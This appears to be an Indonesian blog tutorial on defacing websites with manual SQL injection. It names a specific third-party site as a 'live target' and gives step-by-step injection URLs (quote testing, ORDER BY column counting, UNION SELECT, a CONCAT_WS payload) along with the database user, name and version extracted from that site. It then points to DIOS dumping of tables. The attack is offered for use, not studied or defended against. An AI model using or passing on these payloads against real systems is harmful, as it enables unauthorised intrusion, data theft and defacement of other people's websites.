Lompat ke konten Lompat ke sidebar Lompat ke footer
Tutorial Deface Dengan Cara SQL Injection Manual

Tutorial Deface Dengan Cara SQL Injection Manual

Hai  sobat, kali ini admin akan membagikan terkait tutorial Deface Dengan Cara SQL Injection Manual  beberapa hari yang lalu saya sudah memberikan  tutorial sqli dengan pakai SQLMAP, Nah sekarang admin memberikan caranya dengan cara manual.

Tutorial Deface Dengan Cara SQL Injection Manual


langsung aja ya gan, sans aja live target udh gue sediakan kok :D

LIVE TARGET : http://garudatransindonesia.com/artikel.php?id=9


1. Untuk inject nya lebih mudah pakai Mozilla firefox + hackbar ya :D

2. Masukkan payload ( ' ) *tanpa tanda kurung , di akhir URL, maka website akan blank, menandakan bahwa web tersebut vuln SQL Injection
http://garudatransindonesia.com/artikel.php?id=9'

Tutorial Deface Dengan Cara SQL Injection Manual


3. Selanjutnya beri tanda ( -- - ) di akhir url, contoh seperti ini
http://garudatransindonesia.com/artikel.php?id=9'-- -
Jika web kembali menampilkan artikel secara normal, berarti vuln SQLI

Tutorial Deface Dengan Cara SQL Injection Manual


4. Sekarang kita memakai order+by untuk mencari error nya dimana
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+2-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+5-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+6-- - = ERROR / BLANK



5. Karena order by error nya di nomor 6, sekarang kita union select , untuk mencari column nya di nomor berapa beri tanda ( . ) di belakang parameter nya
Union select di nomor 5, karena order by nya error di nomor 6
http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,2,3,4,5-- -

Tutorial Deface Dengan Cara SQL Injection Manual

6. Yap udh ketemu ya nomor column nya yaitu di angka 2, sekarang kita mencari tau user, database , dan version nya, caranya? kita beri basic statement di menu hackbar kalian
Atau juga bisa memakai payload ini, taruh di letak angka 2
Payload = CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())

http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5-- -

Tutorial Deface Dengan Cara SQL Injection Manual

7, Dan taraaaa, kita sudah mendapatkan user , database , dan version nya

Tutorial Deface Dengan Cara SQL Injection Manual

User         : u2232528_garudatrans@localhost
Database  : u2232528_garuda
Version    : 10.2.17-MariaDB

Untuk mencari table tablenya, tinggal hapus aja payload nya, lalu memakai DIOS yang tersedia di hackbar.

Demikianlah artikel tentang Tutorial Deface Dengan Cara SQL Injection Manual yang semoga bermanfaat dan jika ada pertanyaan silahkan tinggalkan di kolom komentar di bawah ini.
Open Comments